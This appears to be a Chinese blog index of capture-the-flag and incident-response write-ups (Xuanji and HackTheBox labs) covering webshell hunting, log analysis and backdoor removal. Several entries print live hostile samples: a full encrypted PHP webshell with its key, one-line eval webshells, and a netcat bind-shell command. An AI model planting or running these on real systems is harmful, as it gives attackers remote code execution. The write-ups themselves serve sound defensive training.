-
玄机——bulntarget-j-01
上线后首先快速定位网站目录位置phpstudy_pro。审计日志access.log有多份,我们审计修改日期最迟的那份。搜索关键词login可快速定位到登陆的文件名称FNeSOgYGkp.php。而phpstudy搭建的网站服务只有两个端口,随便交一下就可以得到木马文件上传端口为80。 将www文件夹打包到本地,火绒自动报毒显示api3.php为后门文件。注释中标明密码为Admin 查找到后缀前三位为173的日志时发现了对api3.php木马的POST记录。 192.168.112.123 - - [15/Nov/2024:11:01:00 +0800] "POST /api3.php HTTP/1.1" 200 1309 192.168.112.123 - - [15/Nov/2024:11:01:03 +0800] "POST /api3.php HTTP/1.1" 200 3585 192.168.112.123 - - [15/Nov/2024:11:01:07 +0800] "POST /api3.php HTTP/1.1" 200 521 攻击机地址即为上述。
-
HTB——Editorial
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__ \| (__ | (_| || | | |/ ___/ |...
-
玄机——vulntarget-b-01
上来我们先定位web服务的根目录位置,通过检索得知是在/www/wwwroot下。然后使用find+grep快速定位恶意文件位置 find /www -name '*.php' | xargs grep 'eval(' /www/wwwroot/jizhi/index.php:eval($_POST["Admin@@"]); 再查看SSH日志,发现除去我们的登录信息,还有两个可疑IP的Accepted信息。其中192.168.83.1就是成功登陆后台的恶意IP [root@ip-10-0-10-3 log]# cat /var/log/secure Dec 11 16:12:48 MiWiFi-RA80-srv sshd[2600]: Accepted password for root from 192.168.31.190 port 62631 ssh2 Nov 20 11:27:57 localhost sshd[2670]: Accepted password for root from 192.168.83.1 port 28363 ssh2 翻阅网站工作目录下的127.0.0.1.log文件,我们可以发现192.168.83.1对login路由的大量访问。合理怀疑其是在对admin密码进行爆破。观察到其访问端口为81,故入口点端口为81.且记录开头有大量的gobuster标识,所以我们也得知了攻击者的扫描工具及其版本号为gobuster/3.6 接下来审计access.log文件。发现其内部有大量的Nmap记录,怀疑对方使用Nmap进行的端口扫描,故黑客是通的探测ssh服务的工具为Nmap 最后我们需要查找留存的后门文件,根据渗透经验一般可知Linux后门文件一般为.sh或者.elf可执行文件。通过find指令匹配后缀可以很轻松的搜到index.elf。但此题目我的环境有点问题,宝塔自动杀掉了后门,我的index.elf是在垃圾箱内找到的,正常环境此文件于tmp目录下。
-
HTB——SolarLab
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │...
-
玄机——第四章-windows实战-emlog
上线后的第一个flag让我们提交黑客植入的shell。按惯例我们先查杀网站根目录。网站源码整个薅到本地直接报毒在content/plugins/tips文件夹下。内部有shell的密码 <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?> 接下来我们查看网站日志,来判断黑客攻击成功的IP。在access.log的日志尾部,我们可以看到大量向shell.php POST的数据。判断此黑客攻击的IP即为192.168.126.1 接下来我们需要查杀黑客的隐藏账户。渗透的权限维持技术发力了,我们直接lusrmgr.msc查看 用户组内的所有用户。发现一个hacker138$的恶意用户,一眼顶针。但请注意提交时需要去除hacker138$内的$符号,因为windows内此符号代表其为机器账户。 最后我们需要查找到黑客挖矿程序的矿池域名,并将名称作为flag提交。我们在hack138用户桌面下直接就找到了个Kuang.exe,有点幽默了。先使用pyinstxtractor反编译,再将反编译出的文件加上.pyc后找个在线反编译即可看到了。http://wakuang.zhigongshanfang.top
-
HTB——Cascade
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__ \| (__ | (_| || | | |/ ___/ |...
-
HTB——Blurry
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__ \| (__ | (_| || | | |/ ___/ |...
-
玄机——第一章——webshell查杀
上线后我们快速搜索所有可能的后门文件后缀并匹配文件内容如eval,exec等。 find / type f -name '*.php' | xargs grep "eval(" ./var/www/html/include/gz.php: eval($payload); ./var/www/html/include/Db/.Mysqli.php: eval($payload); ./var/www/html/shell.php:<?php phpinfo();@eval($_REQUEST[1]);?> 我们依次翻看此三个文件。在gz.php中找出了第一个flag.通过鉴别文件名及开头三个标识@session_start();@set_time_limit(0);@error_reporting(0);可以得知此为哥斯拉的马,我们将哥斯拉的github地址薅下来md5一下。审计apache2访问日志,可以php://input的代码是走POST的记录不到。我们只能一个个文件夹查找ls -al看有无隐藏文件。发现gz.php的目录下还有一个Db文件夹,内部有一个隐藏的.Musqli.php文件。完整路径为/var/www/html/include/Db/.Mysqli.php.查杀apache2日志并grep一下.php?以查找所有给php文件传参的记录。查到一个top.php与index.php在进行传参行为。 wap文件夹下查看此两文件内容,index为正常业务文件,而top文件为免杀马。
-
玄机——Linux后门应急
登陆上去让我们查看一下后门用户,查看passwd文件直接发现一个backdoor用户,666盐都不盐了 然后我们需要ps -ef查看主机的所有运行的进程信息。查看到nc -lvp 9999 -c flag{infoFl4g}。然后我们需要审计9999端口是通过哪个配置文件启动的。我们需要先查看9999端口的进程。使用ps -aux指令查看启动该进程的启动命令。 user@ip-10-0-10-1:/var/log$ ps -aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 491 1 0 08:27 ? 00:00:00 bash root 497 0.0 0.0 2368 1720 ? S 08:27 0:00 nc -lvp 9999 -c 在使用-p指令查看此进程详细信息。其父进程ID为491,我们跟进查看491进程信息。而491是bash,那我们合理怀疑此进程为系统自动启动。使用systemctl status查看系统正在运行的服务状态 user@ip-10-0-10-1:/etc/systemd$ systemctl status ●...
-
玄机——IIS日志分析
首先需要我们提供phpstudy-2018的站点日志绝对路径。在inetpub内,具体路径视题目内容而定。本题为C:\inetpub\logs\LogFiles\W3SVC2 我们先将日志导出,然后关键词检索 200 注意两边都要有空格,不然会匹配字符串中的200,搜索出有2315条请求回显为200的记录。再搜索HTTP的请求方法,经统计有GET、POST、DELETE、PUT、OPTIONS、HEAD、TRACE七种 使用python脚本处理,将访问php文件的记录全部提取出来。观察phpstudy_pro搭建的服务可知是emlog。查找emlog文件上传漏洞,得知其路径为/emlog/admin/plugin.php。 故上传路径为/emlog/admin/plugin.php # 读取日志文件并筛选出所有POST请求的记录 log_file_path = 'u_ex250220.log' output_file_path = 'filtered_post_requests.log' # 打开日志文件读取,创建一个新的文件来保存POST请求记录 with open(log_file_path, 'r', encoding='utf-8') as log_file, open(output_file_path, 'w', encoding='utf-8') as output_file: for line in log_file: # 检查请求方法是否为POST,假设日志格式中包含"POST"字样 if 'POST' in line: output_file.write(line) print(f"所有POST请求的记录已经筛选并保存到:{output_file_path}") 审计漏洞描述得知上传的马一般都会在plugins目录下,我们写个python脚本将此特征记录筛选出来。但貌似并没有什么明显的GET方式RCE。换个思路,我们审计一下emlog中对应位置的上传文件,看看有无恶意文件。在plugin文件夹下翻到一个木马。